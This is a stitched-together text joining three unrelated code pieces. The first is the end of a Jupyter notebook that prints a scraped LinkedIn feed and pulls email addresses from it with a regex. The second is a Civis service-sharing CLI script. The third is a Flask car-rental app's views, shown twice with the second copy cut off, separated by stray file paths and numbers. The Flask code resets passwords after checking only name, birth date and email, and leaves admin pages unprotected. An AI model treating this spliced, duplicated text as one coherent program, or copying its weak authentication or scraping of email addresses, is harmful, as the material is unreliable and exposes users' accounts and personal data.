"\n",
"Reply\n",
"\n",
"Load more comments\n",
"Feed post number 5\n",
"Sammeer’s profile photo\n",
"<NAME> loves this\n",
"\n",
"<NAME>, Ph.D\n",
"<NAME>, Ph.D\n",
"• 2nd\n",
"Social Media Marketing|Please click FOLLOW button for the latest development in Civil Engineering || 230K+ Followers ||\n",
"23h • 23 hours ago\n",
"Follow\n",
" What Causes Breakdowns in Traffic Flow?\n",
"\n",
"The layman's definition of congestion is \"too many cars trying to use a highway at the same time\". Transportation engineers formalize this idea as capacity—the ability to move vehicles past a point over a given span of time. When the capacity of a highway section is exceeded, traffic flow breaks down, speeds drop, and vehicles crowd together. These actions cause traffic to back up behind the disruption.\n",
"\n",
"Basically, there are three types of traffic flow behavior that will cause traffic flow to break down:\n",
"\n",
"1- \"Bunching\" of vehicles as a result of reduced speed.\n",
"2- Intended Interruption to Traffic Flow.\n",
"3- Vehicle Merging Maneuvers. \n",
"\n",
"With all this information, I believe this dog got the concept and found the solution better than me as a Highway engineer ;)\n",
"\n",
"If you found the content informative, you may Follow me by <NAME>, Ph.D for more!\n",
"\n",
"Video Credit: IG @ earthdixe\n",
".......................................................................\n",
"All rights and credits are reserved to the respective owner(s). If you are the main copyright owner rather than the one mentioned here of this content, contact me to claim credit or content removal.\n",
"\n",
"Check out #mehrtashsoltani for educational and practical content in civil engineering!\n",
"…see more\n",
"\n",
"Pause\n",
"Back to start of video\n",
"Skip back 10 seconds\n",
"Skip ahead 10 seconds\n",
"Current time 0:04/Duration 0:18\n",
" \n",
"1x\n",
"\n",
"Playback speed\n",
"\n",
"Unmute\n",
"\n",
"Turn fullscreen on\n",
"likelovecelebrate\n",
"3,781\n",
"<NAME> and 3,780 others\n",
"178 comments\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"Feed post number 6\n",
"Supermetrics\n",
"Supermetrics\n",
"13,205 followers\n",
"Promoted\n",
"\n",
"Supermetrics has been listed on G2 as the highest rated marketing data pipeline company of 2022.\n",
"\n",
"Over 17,000 companies already use Supermetrics to streamline marketing reports.\n",
"\n",
"Join our happy customers and start your free trial today!\n",
"…see more\n",
"\n",
"Start your free trial today\n",
"supermetrics.comRegister. View Sponsored Content\n",
"Register\n",
"likelove\n",
"61\n",
"1 comment\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"Feed post number 7\n",
"Samundra’s profile photo\n",
"<NAME> loves this\n",
"\n",
"<NAME>\n",
"<NAME>\n",
"• 2nd\n",
"Here to write. If it goes viral, it's not because of me. It's because it's true.\n",
"3d • 3 days ago\n",
"Follow\n",
"\n",
"No alternative text description for this imageActivate to view larger image\n",
"likelovecelebrate\n",
"68,665\n",
"<NAME> and 68,664 others\n",
"1,154 comments\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"\n",
"Show more results\n",
"Add to your feed\n",
"\n",
"National Association of REALTORS®;<EMAIL> \n",
"National Association of REALTORS®\n",
"Company • Real Estate\n",
"\n",
"Follow\n",
"<NAME>\n",
"<NAME>\n",
"Bestselling Author | Host of the Women & Money Podcast | Co-Founder of SecureSave\n",
"\n",
"Follow\n",
"National Association of Home Builders\n",
"National Association of Home Builders\n",
"Company • Construction\n",
"\n",
"Follow\n",
"View all recommendations \n",
"\n",
"About\n",
"Accessibility\n",
"Help Center\n",
"\n",
"Privacy & Terms \n",
"Ad Choices\n",
"Advertising\n",
"\n",
"Business Services \n",
"Get the LinkedIn app\n",
"More\n",
" LinkedIn Corporation © 2022 <EMAIL> \n",
"<NAME>Status is online\n",
"MessagingYou are on the messaging overlay. Press enter to open the list of conversations.\n",
"\n",
"\n",
"Compose message\n",
"\n",
"You are on the messaging overlay. Press enter to open the list of conversations.\n",
"\n"
]
}
],
"source": [
"\n",
"f = open(\"C:\\\\Users\\\\super\\Downloads\\\\Week 1 Test\\\\websiteData.txt\", \"r\", encoding=\"utf8\")\n",
"print(f.read())"
]
},
{
"cell_type": "code",
"execution_count": 67,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"['<EMAIL>']\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"['<EMAIL>']\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"['<EMAIL>']\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"['<EMAIL>']\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"['<EMAIL>']\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"['<EMAIL>']\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"['<EMAIL>']\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"['<EMAIL>']\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n"
]
}
],
"source": [
"f = open(\"C:\\\\Users\\\\super\\Downloads\\\\Week 1 Test\\\\websiteData.txt\", \"r\", encoding=\"utf8\")\n",
"\n",
"for line in f:\n",
" \n",
" s = line.strip()\n",
" \n",
" \n",
" reg = re.findall(r\"[A-Za-z0-9._%+-]+\"\n",
" r\"@[A-Za-z0-9.-]+\"\n",
" r\"\\.[A-Za-z]{2,4}\", s)\n",
" \n",
" \n",
" print(reg)\n",
" \n",
" \n"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": []
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": []
}
],
"metadata": {
"kernelspec": {
"display_name": "Python 3",
"language": "python",
"name": "python3"
},
"language_info": {
"codemirror_mode": {
"name": "ipython",
"version": 3
},
"file_extension": ".py",
"mimetype": "text/x-python",
"name": "python",
"nbconvert_exporter": "python",
"pygments_lexer": "ipython3",
"version": "3.8.5"
}
},
"nbformat": 4,
"nbformat_minor": 4
} | 0.39946 | 0.249544 |
import argparse
import civis
def list_services(args):
client = civis.APIClient()
services = client.services.list()
print("List of services:")
for service in services:
print(f"\tID: {service['id']}\tName: {service['name']}")
def share_service(args):
client = civis.APIClient()
service = client.services.get(args.id)
try:
response = client.services.post_tokens(args.id, args.name)
url = f"{service['current_url']}/civis-platform-auth?token={response['token']}"
print(f"Share service id {args.id} with the following URL: {url}")
except civis.base.CivisAPIError as e:
if "Name has already been taken" in str(e):
print(
f"The share name {args.name} is already in use. "
"Please choose another"
)
else:
raise e
def unshare_service(args):
client = civis.APIClient()
tokens = client.services.list_tokens(args.id)
try:
token = next(t for t in tokens if t["name"] == args.name)
client.services.delete_tokens(args.id, token["id"])
print(f"Successfully unshared {args.name}")
except StopIteration:
print(f"Could not find share token with the name {args.name}")
def main():
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers()
list_parser = subparsers.add_parser("list")
list_parser.set_defaults(func=list_services)
share_parser = subparsers.add_parser("share")
share_parser.add_argument("id", type=int, help="The ID of the service to share")
share_parser.add_argument("name", type=str, help="A name to give the share URL")
share_parser.set_defaults(func=share_service)
unshare_parser = subparsers.add_parser("unshare")
unshare_parser.add_argument("id", type=int, help="The ID of the service to unshare")
unshare_parser.add_argument(
"name", type=str, help="The name of the service to unshare"
)
unshare_parser.set_defaults(func=unshare_service)
args = parser.parse_args()
args.func(args)
if __name__ == "__main__":
main() | civis/civis-aqueduct-utils/civis_aqueduct_utils/share.py | import argparse
import civis
def list_services(args):
client = civis.APIClient()
services = client.services.list()
print("List of services:")
for service in services:
print(f"\tID: {service['id']}\tName: {service['name']}")
def share_service(args):
client = civis.APIClient()
service = client.services.get(args.id)
try:
response = client.services.post_tokens(args.id, args.name)
url = f"{service['current_url']}/civis-platform-auth?token={response['token']}"
print(f"Share service id {args.id} with the following URL: {url}")
except civis.base.CivisAPIError as e:
if "Name has already been taken" in str(e):
print(
f"The share name {args.name} is already in use. "
"Please choose another"
)
else:
raise e
def unshare_service(args):
client = civis.APIClient()
tokens = client.services.list_tokens(args.id)
try:
token = next(t for t in tokens if t["name"] == args.name)
client.services.delete_tokens(args.id, token["id"])
print(f"Successfully unshared {args.name}")
except StopIteration:
print(f"Could not find share token with the name {args.name}")
def main():
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers()
list_parser = subparsers.add_parser("list")
list_parser.set_defaults(func=list_services)
share_parser = subparsers.add_parser("share")
share_parser.add_argument("id", type=int, help="The ID of the service to share")
share_parser.add_argument("name", type=str, help="A name to give the share URL")
share_parser.set_defaults(func=share_service)
unshare_parser = subparsers.add_parser("unshare")
unshare_parser.add_argument("id", type=int, help="The ID of the service to unshare")
unshare_parser.add_argument(
"name", type=str, help="The name of the service to unshare"
)
unshare_parser.set_defaults(func=unshare_service)
args = parser.parse_args()
args.func(args)
if __name__ == "__main__":
main() | 0.184217 | 0.116111 |
from flask import Flask, jsonify, render_template, request, redirect, session, url_for
import requests,os,json
from flask_googlemaps import Map
from flask_googlemaps import icons
from app import app, mainEngine, gMap
@app.route('/')
def index():
return render_template("mainlogin.html")
@app.route('/login', methods = ('GET','POST'))
def login():
error = False
if request.method=='POST':
email = request.form['email']
password = request.form['password']
error = True
if mainEngine.login(email, password):
session['email'] = email
return redirect('/customer/home')
return render_template("index.html", error = error, success = False, change = False)
@app.route('/admin', methods = ('GET','POST'))
def adminlogin():
error = False
if request.method=='POST':
username = request.form['username']
password = request.form['password']
error = True
if mainEngine.admin_login(username, password):
session['username'] = username
return redirect('/admin/home')
return render_template("adminLogin.html", error = error)
@app.route('/admin/home')
def admin_home():
return render_template("admin/home.html", username = session['username'] )
@app.route('/admin/carlist')
def admin_car():
cars = mainEngine.getAllCars()
return render_template("admin/carlist.html", cars = cars )
@app.route('/admin/addcar', methods = ('GET','POST'))
def addcar():
success = True
if request.method=='POST':
name = request.form['name']
colour = request.form['color']
description = request.form['description']
capacity = request.form['capacity']
registration_plate = request.form['regPlate']
fuel_type = request.form['fuel']
transmission = request.form['transmission']
type_ = request.form['type']
image = request.form['image']
longitude = request.form['longitude']
latitude = request.form['latitude']
if mainEngine.carRegistrationValidation(registration_plate):
mainEngine.insertCar(name, colour, description, capacity, registration_plate, fuel_type, transmission, type_, longitude, latitude, image)
return redirect("/admin/carlist")
success = False
return render_template("admin/addcar.html", success = success)
@app.route('/admin/editcarpage', methods = ['POST'])
def updatecarpage():
car_id = request.form['id']
car = mainEngine.getCar(car_id)[0]
return render_template('admin/editcar.html', car=car)
@app.route('/admin/edit-car', methods = ['POST'])
def editcar():
success = True
car_id = request.form['id']
car = mainEngine.getCar(car_id)[0]
name = request.form['name']
colour = request.form['color']
description = request.form['description']
capacity = request.form['capacity']
registration_plate = request.form['regPlate']
fuel_type = request.form['fuel']
transmission = request.form['transmission']
type_ = request.form['type']
image = request.form['image']
longitude = request.form['longitude']
latitude = request.form['latitude']
if mainEngine.editCarRegistrationValidation(registration_plate, car_id):
mainEngine.editCar(car_id, name, colour, description, capacity, registration_plate, fuel_type, transmission, type_, longitude, latitude, image)
return redirect("/admin/carlist")
success = False
return render_template("admin/editcar.html", car=car, success = success)
@app.route('/admin/userlist')
def userlist():
customers = mainEngine.getAllCustomers()
addresses = mainEngine.getAllAddresses()
licenses = mainEngine.getAllLicenses()
return render_template("admin/userlist.html", customers = customers, addresses = addresses, licenses = licenses)
@app.route('/register', methods = ('GET', 'POST'))
def register():
error = False
validDOB = True
validLicense = True
if request.method=='POST':
# personal details
fname = request.form['fname']
lname = request.form['lname']
dob = request.form['date']
phone = request.form['phone']
email = request.form['email']
password = request.form['password']
# address details
unit = request.form['unitno']
street = request.form['street']
suburb = request.form['suburb']
state = request.form['state']
postcode = request.form['postcode']
string_address = postcode + ", " + state
# license details
lnumber = request.form['lnumber']
country = request.form['country']
license_state = request.form['license-state']
issue_date = request.form['idate']
expiry_date = request.form['edate']
if mainEngine.check_duplicate_email(email) is False:
if mainEngine.validateDOB(dob) is True:
if mainEngine.validateLicenseDate(issue_date, expiry_date):
mainEngine.register(fname, lname, dob, email, password, phone)
cust_id = mainEngine.getCustomer(email)[0]
url = 'https://maps.googleapis.com/maps/api/geocode/json'
params = {'sensor': 'false', 'address': string_address, 'key': '<KEY>'}
r = requests.get(url, params=params)
results = r.json()['results']
location = results[0]['geometry']['location']
mainEngine.insertAddress(cust_id, unit, street, suburb, state, postcode, location['lat'], location['lng'])
mainEngine.insertLicense(cust_id, lnumber, country, license_state, issue_date, expiry_date)
return render_template("index.html", error = False, success = True, change = False)
else:
validLicense = False
else:
validDOB = False
else:
error = True
return render_template("register.html", error = error, validDOB = validDOB, validLicense = validLicense)
@app.route('/logout')
def logout():
session.clear()
return redirect("/")
@app.route('/customer/home')
def home():
return render_template("customer/home.html", email = session['email'])
@app.route('/customer/booking', methods = ('GET', 'POST'))
def booking():
valid = True
if request.method=='POST':
car_id = request.form['car']
start_date = request.form['sdate']
start_time = request.form['stime']
end_date = request.form['edate']
end_time = request.form['etime']
if mainEngine.validateBookingTime(start_date, start_time, end_date, end_time):
time = mainEngine.getTotalBookingTime(start_date, start_time, end_date, end_time)
cust = mainEngine.getCustomer(session['email'])
plan = cust[7]
cars = mainEngine.getCar(car_id)
cost = 0
if plan == 0:
cost = mainEngine.getTotalBookingCost(start_date, start_time, end_date, end_time, cars[0][10])
else:
cost = mainEngine.getTotalBookingCost(start_date, start_time, end_date, end_time, 15)
return render_template("customer/bookingPayment2.html", cars=cars, start_date=start_date, start_time=start_time, end_date=end_date, end_time=end_time, time=time, cost=cost, success=True)
else:
valid = False
cars = mainEngine.getAvalaibleCars()
mark = []
if cars:
for car in cars:
mark.append((float(car[12]), float(car[11]), car[1]))
gmap = Map(
identifier="gmap",
varname="gmap",
#MELBOURNE COORDINATE
lat=-37.8136,
lng=144.9631,
markers={
icons.dots.blue: mark,
},
style="height:max-500px;max-width:1000px;margin:0;margin-left:auto;margin-right:auto;",
)
return render_template("customer/booking2.html", cars = cars, gmap = gmap, valid = valid)
@app.route('/customer/booking-summary', methods = ['POST'])
def booking_summary():
if request.method=='POST':
car_id = request.form['car']
start_date = request.form['sdate']
start_time = request.form['stime']
end_date = request.form['edate']
end_time = request.form['etime']
time = request.form['time']
cost = request.form['cost']
name = request.form['namecard']
card = request.form['cardnumber']
date = request.form['date']
cvv = request.form['cvv']
cust = mainEngine.getCustomer(session['email'])
if mainEngine.card_validation(name, card, date, cvv):
mainEngine.makeBooking(cust[0], car_id, start_date, start_time, end_date, end_time, time, cost)
mainEngine.setCarUnavalaible(car_id)
return redirect("/customer/ongoing-booking")
else:
cars = mainEngine.getCar(car_id)
return render_template("customer/bookingPayment2.html", cars=cars, start_date=start_date, start_time=start_time, end_date=end_date, end_time=end_time, time=time, cost=cost, success=False)
@app.route('/reset-password', methods = ('GET', 'POST'))
def reset():
invalid = False
diff = False
if request.method=='POST':
fname = request.form['fname']
lname = request.form['lname']
dob = request.form['date']
email = request.form['email']
password = request.form['pass']
confirm_password = request.form['<PASSWORD>']
cust_id = mainEngine.validateCustCredentials(email, fname, lname, dob)
if cust_id is not None:
if mainEngine.confirmPassword(password, confirm_password):
mainEngine.resetPassword(password, cust_id)
return render_template("index.html", error = False, success = False, change = True)
else:
diff = True
else:
invalid = True
return render_template("reset-1.html", invalid = invalid, diff = diff)
@app.route('/customer/ongoing-booking')
def ongoing_booking():
cust_id = mainEngine.getCustomer(session['email'])[0]
bookings = mainEngine.getPersonalOngoingBooking(cust_id)
cars = mainEngine.getAllCars()
return render_template("customer/ongoingBooking.html", bookings = bookings, cars = cars)
@app.route('/customer/booking-history')
def booking_history():
cust_id = mainEngine.getCustomer(session['email'])[0]
bookings = mainEngine.getPersonalBookingHistory(cust_id)
cars = mainEngine.getAllCars()
return render_template("customer/bookingHistory.html", bookings = bookings, cars = cars)
@app.route('/customer/search-car', methods = ('GET', 'POST'))
def search_car():
cars = {}
if request.method=='POST':
column = request.form['column']
search = request.form['search']
cars = mainEngine.searchCars(column, search)
mark = []
if cars:
for car in cars:
mark.append((float(car[12]), float(car[11]), car[1]))
gmap = Map(
identifier="gmap",
varname="gmap",
#MELBOURNE COORDINATE
lat=-37.8136,
lng=144.9631,
markers={
icons.dots.blue: mark,
},
style="height:max-500px;max-width:1000px;margin:0;margin-left:auto;margin-right:auto;",
)
return render_template("/customer/searchCar.html", gmap=gmap, cars= cars)
@app.route('/customer/search-car-near-me', methods = ['POST'])
def search_car_by_location():
cust_id = mainEngine.getCustomer(session['email'])[0]
address = mainEngine.getAddress(cust_id)
car_list = mainEngine.getAvalaibleCars()
cars = mainEngine.distance(car_list, address)
mark = []
if cars:
for car in cars:
mark.append((float(car[12]), float(car[11]), car[1]))
gmap = Map(
identifier="gmap",
varname="gmap",
#MELBOURNE COORDINATE
lat=address[7],
lng=address[8],
markers={
icons.dots.blue: mark,
},
style="height:max-500px;max-width:1000px;margin:0;margin-left:auto;margin-right:auto;",
)
return render_template("/customer/searchCar.html", gmap=gmap, cars= cars)
@app.route('/customer/plan')
def plan():
cust = mainEngine.getCustomer(session['email'])
plan = cust[7]
return render_template("/customer/price.html", plan = plan)
@app.route('/customer/set-plan')
def set_standard():
cust = mainEngine.getCustomer(session['email'])
mainEngine.set_plan(cust[7],cust[0])
return redirect("/customer/plan")
@app.route('/customer/cancel-booking', methods = ['POST'])
def cancel_booking():
booking_id = request.form['booking_id']
mainEngine.cancelBooking(booking_id)
booking = mainEngine.getBooking(booking_id)
mainEngine.setCarAvalaible(booking[0][2])
return redirect("/customer/ongoing-booking")
@app.route('/customer/complete-booking', methods = ['POST'])
def complete_booking():
booking_id = request.form['booking_id']
mainEngine.completeBooking(booking_id)
booking = mainEngine.getBooking(booking_id)
mainEngine.setCarAvalaible(booking[0][2])
return redirect("/customer/booking-history")
@app.route('/admin/delete-car', methods = ['POST'])
def delete_car():
car_id = request.form['car_id']
mainEngine.deleteCar(car_id)
return redirect("/admin/carlist")
@app.route('/customer/plan-summary', methods = ('GET', 'POST'))
def plan_summary():
cust = mainEngine.getCustomer(session['email'])
if request.method=='POST':
name = request.form['namecard']
card = request.form['cardnumber']
date = request.form['date']
cvv = request.form['cvv']
if mainEngine.card_validation(name, card, date, cvv):
mainEngine.set_premium_expiry(cust[0])
else:
return render_template("customer/planPayment2.html", success=False)
cust = mainEngine.getCustomer(session['email'])
if not cust[8] or not mainEngine.validate_premium(cust[8]):
return render_template("customer/planPayment2.html", success=True)
return redirect("/customer/set-plan") | code/app/views.py | from flask import Flask, jsonify, render_template, request, redirect, session, url_for
import requests,os,json
from flask_googlemaps import Map
from flask_googlemaps import icons
from app import app, mainEngine, gMap
@app.route('/')
def index():
return render_template("mainlogin.html")
@app.route('/login', methods = ('GET','POST'))
def login():
error = False
if request.method=='POST':
email = request.form['email']
password = request.form['password']
error = True
if mainEngine.login(email, password):
session['email'] = email
return redirect('/customer/home')
return render_template("index.html", error = error, success = False, change = False)
@app.route('/admin', methods = ('GET','POST'))
def adminlogin():
error = False
if request.method=='POST':
username = request.form['username']
password = request.form['password']
error = True
if mainEngine.admin_login(username, password):
session['username'] = username
return redirect('/admin/home')
return render_template("adminLogin.html", error = error)
@app.route('/admin/home')
def admin_home():
return render_template("admin/home.html", username = session['username'] )
@app.route('/admin/carlist')
def admin_car():
cars = mainEngine.getAllCars()
return render_template("admin/carlist.html", cars = cars )
@app.route('/admin/addcar', methods = ('GET','POST'))
def addcar():
success = True
if request.method=='POST':
name = request.form['name']
colour = request.form['color']
description = request.form['description']
capacity = request.form['capacity']
registration_plate = request.form['regPlate']
fuel_type = request.form['fuel']
transmission = request.form['transmission']
type_ = request.form['type']
image = request.form['image']
longitude = request.form['longitude']
latitude = request.form['latitude']
if mainEngine.carRegistrationValidation(registration_plate):
mainEngine.insertCar(name, colour, description, capacity, registration_plate, fuel_type, transmission, type_, longitude, latitude, image)
return redirect("/admin/carlist")
success = False
return render_template("admin/addcar.html", success = success)
@app.route('/admin/editcarpage', methods = ['POST'])
def updatecarpage():
car_id = request.form['id']
car = mainEngine.getCar(car_id)[0]
return render_template('admin/editcar.html', car=car)
@app.route('/admin/edit-car', methods = ['POST'])
def editcar():
success = True
car_id = request.form['id']
car = mainEngine.getCar(car_id)[0]
name = request.form['name']
colour = request.form['color']
description = request.form['description']
capacity = request.form['capacity']
registration_plate = request.form['regPlate']
fuel_type = request.form['fuel']
transmission = request.form['transmission']
type_ = request.form['type']
image = request.form['image']
longitude = request.form['longitude']
